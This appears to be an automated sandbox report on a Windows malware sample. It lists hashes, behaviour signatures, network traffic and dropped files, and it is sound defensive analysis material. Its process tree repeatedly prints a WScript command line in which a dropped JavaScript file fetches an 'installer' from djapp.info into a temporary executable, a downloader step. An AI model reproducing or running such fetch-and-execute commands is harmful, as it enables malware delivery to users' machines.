Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    26/05/2024, 10:58 UTC

General

  • Target

    7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    7541be9044f3a1d7ab258bb36f857a2e

  • SHA1

    25b38a97fd748ef26874fa390f98597013ef102d

  • SHA256

    b42dfb8edbed135a21427c868a0154aea5b04ae8cd7077fe078a297790ecbc19

  • SHA512

    40343f0d547e57b4d26f776fd3a1bdf6b791f0ba0e26355968a4c899926cf89e320bc5dbcf72d88ccef5fa145beb099d6a9e4d17320c80ccfbd61c69ea4fbcda

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3+i:/7BSH8zUB+nGESaaRvoB7FJNndn2

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe
      2⤵
      • Blocklisted process makes network request
      PID:2200
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe
      2⤵
      • Blocklisted process makes network request
      PID:2632
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe
      2⤵
      • Blocklisted process makes network request
      PID:2556
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe
      2⤵
      • Blocklisted process makes network request
      PID:2160
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe
      2⤵
      • Blocklisted process makes network request
      PID:1764

Network

  • US
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • US
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-2.hugedomains.com
    traff-2.hugedomains.com
    IN CNAME
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.204.160
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.253.23
  • US
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.204.160:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 26 May 2024 10:59:08 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • US
    DNS
    www.hugedomains.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hugedomains.com
    IN A
    Response
    www.hugedomains.com
    IN A
    104.26.7.37
    www.hugedomains.com
    IN A
    172.67.70.191
    www.hugedomains.com
    IN A
    104.26.6.37
  • US
    DNS
    crl.verisign.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    crl.verisign.com
    IN A
    Response
    crl.verisign.com
    IN CNAME
    crl-symcprod.digicert.com
    crl-symcprod.digicert.com
    IN CNAME
    crl.edge.digicert.com
    crl.edge.digicert.com
    IN CNAME
    fp2e7a.wpc.2be4.phicdn.net
    fp2e7a.wpc.2be4.phicdn.net
    IN CNAME
    fp2e7a.wpc.phicdn.net
    fp2e7a.wpc.phicdn.net
    IN A
    192.229.221.95
  • US
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.7.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 May 2024 10:59:09 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: site_version_phase=108; expires=Wed, 21-May-2025 10:59:09 GMT; path=/
    set-cookie: site_version=HDv3; expires=Wed, 21-May-2025 10:59:09 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z8365lZPTEkBb4Ush2TWY5PpOtzIJ01hNz%2BZa5IwTi2%2FJ9rvzP9fu54eP3J%2BKYbsKO86hm%2BOr0ZWzooKLz6l%2F9Wc7u94D8%2ByPIh7yIP5%2Bq72Sao2iFYJ4d4qIeri2xmSz04LMp0%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 889d410cabcf7795-LHR
    Content-Encoding: gzip
  • US
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-6.hugedomains.com
    traff-6.hugedomains.com
    IN CNAME
    hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com
    hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com
    IN A
    18.119.154.66
    hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com
    IN A
    3.140.13.188
  • US
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    18.119.154.66:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 26 May 2024 10:59:14 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • US
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.7.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 May 2024 10:59:15 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2PtF6yq%2BTMIVLG6f7vUEVAEKvA%2FlLRxgSnvJDzmAUk9hy40cbb1We2ncTF9M9kWQZnScQL12UudaBPRcX%2FoXw90VWdlPcPU%2BuKm5UrbXvn2yJvQw1NTQIrRyyj2wzdWO%2FUSG6go%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 889d41379e2493ef-LHR
    Content-Encoding: gzip
  • US
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    18.119.154.66:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 26 May 2024 10:59:21 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • US
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.7.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 May 2024 10:59:22 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qryssScNrbpcmU5%2BICawunBKQhmoBKMmKd0GCZzc5224LwxM0rQ8oxlZ5DJoyXHd%2FaBJccjRDv%2Fr%2F9LghGswZqZz1Lu8axDxvbfKlsBGvmrODLbszbP8v4govU1uvAuBQSRoFTg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 889d415e7a6a4142-LHR
    Content-Encoding: gzip
  • US
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    18.119.154.66:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 26 May 2024 10:59:27 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • US
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.7.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 May 2024 10:59:28 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iMwMpq8G3qhgemrGltSL%2F4d0I9vT1vUt%2FB99X9NstbSvgFhvxsnkLKofqFjTrxDdx3ON461w8HuTpMtTUVeYOl%2FxIMbisLA4GMHj8HhrimxAWcHpnAK6MDgdz%2FDWAEat%2F4Uaz%2Bw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 889d41854a86dc73-LHR
    Content-Encoding: gzip
  • US
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    18.119.154.66:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 26 May 2024 10:59:33 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • US
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.7.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 May 2024 10:59:34 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FKInO%2FFpXRRhVm6CY35zWvm6DAxIGcGW%2FYjx2PNuZY6O%2BcTlMB0O8%2FY3lgtDetlwIuOJt6iCg2wYOmY5r3PwO%2FL8iYmSmGUBcc208FYQL%2BX9eil9CtbOwNbG%2BV5RSlAUuEq3nzE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 889d41abb94f79c4-LHR
    Content-Encoding: gzip
  • 3.130.204.160:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    712 B
    434 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.7.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.4kB
    16.6kB
    16
    24

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 18.119.154.66:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.7.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.4kB
    16.2kB
    14
    19

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 18.119.154.66:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    712 B
    434 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.7.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.4kB
    16.1kB
    14
    19

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 18.119.154.66:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    712 B
    434 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.7.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.5kB
    16.5kB
    16
    24

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 18.119.154.66:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    712 B
    434 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.7.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.4kB
    16.1kB
    14
    19

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
    139 B
    1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
    191 B
    1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    3.130.204.160
    3.130.253.23

  • 8.8.8.8:53
    www.hugedomains.com
    dns
    WScript.exe
    127 B
    315 B
    2
    2

    DNS Request

    www.hugedomains.com

    DNS Response

    104.26.7.37
    172.67.70.191
    104.26.6.37

    DNS Request

    crl.verisign.com

    DNS Response

    192.229.221.95

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
    192 B
    1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    18.119.154.66
    3.140.13.188

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    beba3522cd7eb77a09fe36abcb252a4f

    SHA1

    220cb347af597d4f8aacacff27eb0ce64207e99b

    SHA256

    63c5ec564440d74f3c2c2a161a66a22dbf30b03659f3309419a359ee1f8c0d4e

    SHA512

    35eb19b0e1061370a951b1ca3f66288c6ed1732ce7c94fc663eb3959383e0f5d8fc28b3ab1cb9f5f3cb75a314c3d1a0a62694f51490760ea88e8772916f49774

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    4b1fb413768013dd631ede3aab181222

    SHA1

    facd0b552964de15d0e2a0540be06a16670b67d0

    SHA256

    7a16a37868af6947c2f52dcc9c99150f24e8628428a23b7e25e202d67e71e705

    SHA512

    31c60bda3cf5a789a24a9d14464ee9a6ece38906124abe90e609be9b6e8b1143405f4eaae6f6bf478a0fb0ca25cfebcd0a373434161e4b94b153cc088eb9610e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    a1ff7bd0c5e9787f81690bc30a6eec13

    SHA1

    228b30acadb5016ae4b0cf717ec840eecf6b9bd9

    SHA256

    1fb0a1937912e1e264876319f161398a4350dba23bbbc79a09f4b682ced8514b

    SHA512

    199833901108bbcbc9f8b297549570a71460ecbba6e664be13d23345309f1f44bd6f087584169c869d684e97a0a3430da8c791fc6c6c058d9df59a1eb6d06ab8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    c1b8ac3b17618be239b4f86debc28f28

    SHA1

    eae0e49b67aa1f743b9af1eea5dcb13332fa233d

    SHA256

    04e1d65892a09199e2677947ab609e3d408d58bbb33792c7966347d9dc490082

    SHA512

    f361f5ba92b634ad0e853ac4c09013c1d302e71a42d2fea4109ad2bdcfcb5472d35f0895230ac2c66738453d57a8d13505ffa1be2774dde3995462add6eae2bf

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

    Filesize

    40KB

    MD5

    59c859a8197db9a36286c364ed8e8373

    SHA1

    53bb2708ef001021cb91ba7ed03908873e70af15

    SHA256

    180a2924f395fb3b793930aaf261932f29a8fa5d32c956a7bada2a5c4f9745f5

    SHA512

    15e398e5dbd88e2b1e82603ab116ab60e6ab931a1599d1e403b93f70be83fc66c2b56c09e584aa580cc5cfc8029b1a77da27e6c0138e264f36efd6a7c38ed1f9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

    Filesize

    40KB

    MD5

    35ac46928fff89ce0e0837e8aed103c1

    SHA1

    81212da855e5b1e47f40a0c0a3ebe7bd786d215a

    SHA256

    8e88d51a7d0611bb48bee726000a8127bcb14ea5c0d3322cf0b908dae44080fe

    SHA512

    5afd5b1a123a14f93d82d4996384db898de8e391aa90388e2cadae8f64dbadb440eeeef9393e43e91335d0e0ed65690005992589e292e95f49a0f14ff47d02f8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

    Filesize

    40KB

    MD5

    12757d5e2769c789029997f38aa09933

    SHA1

    76381ca1c92cadc1ed5eb9b6ea9ec2c12af9e652

    SHA256

    db74725636e948b4a2f0a926472d01923ea1fe55e9d43f72e7fd6961f9c46c40

    SHA512

    9c43674817f349ef3dff15b8158d010d7291e2c0397a92ae6e7436c2dd33109c2c5efc041c666be31125d2705321f5582f39f38742841bd936b14693400ddd04

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

    Filesize

    40KB

    MD5

    9d04e87e950fda23ec57c6cdfb985765

    SHA1

    b5b6a91a006d3d3688224db22a1706d487e1b3cb

    SHA256

    fc83faab1877ca662569a166aa9e8d4eeccfc558d27d58ddf583eea409010c91

    SHA512

    cd1a34b73d7b0fc34a7b22d111e44a59a33b1166ada3755299ccacb854d34e7c3a4565119ba418ef51c2155421d3787dcf30ce5a9ee68c3036f069d13d630d90

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

    Filesize

    40KB

    MD5

    58f500f8828bb404119df82c494898aa

    SHA1

    47c4d3e529f4c1f125750ebaf3062bb032610538

    SHA256

    b13a79b344e0cf7ac434172cb20858170d2f68fb7b37a1449ba8e6d4d46c7e6c

    SHA512

    c25ab52f0d404da0e376297043f67d0a662d44ebf4436fcf89b6a086840e02dc2b0cda210b91a02e20a1993782ba36907865928338e9142afb3214d3bdbda806

  • C:\Users\Admin\AppData\Local\Temp\Cab4808.tmp

    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

  • C:\Users\Admin\AppData\Local\Temp\Tar604A.tmp

    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

  • C:\Users\Admin\AppData\Local\Temp\fuf1870.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\BNG5784G.txt

    Filesize

    177B

    MD5

    60f07c205254b5ddb4469ee675650502

    SHA1

    faeca9302a72d23b6b8043e24a5d8a16ea2b116f

    SHA256

    3e4b8b9840ff69f44e1a06deadd2b105809a763b5637b801fa6c2aa656ab260e

    SHA512

    70d96a67fc3bfa8d7957aad95ed2b664388240984e4143339cc818edb58819fa94d3a83e31f1701a98309ea9994b3fbba2c09a6538a3660c33b96edb6e99f18c
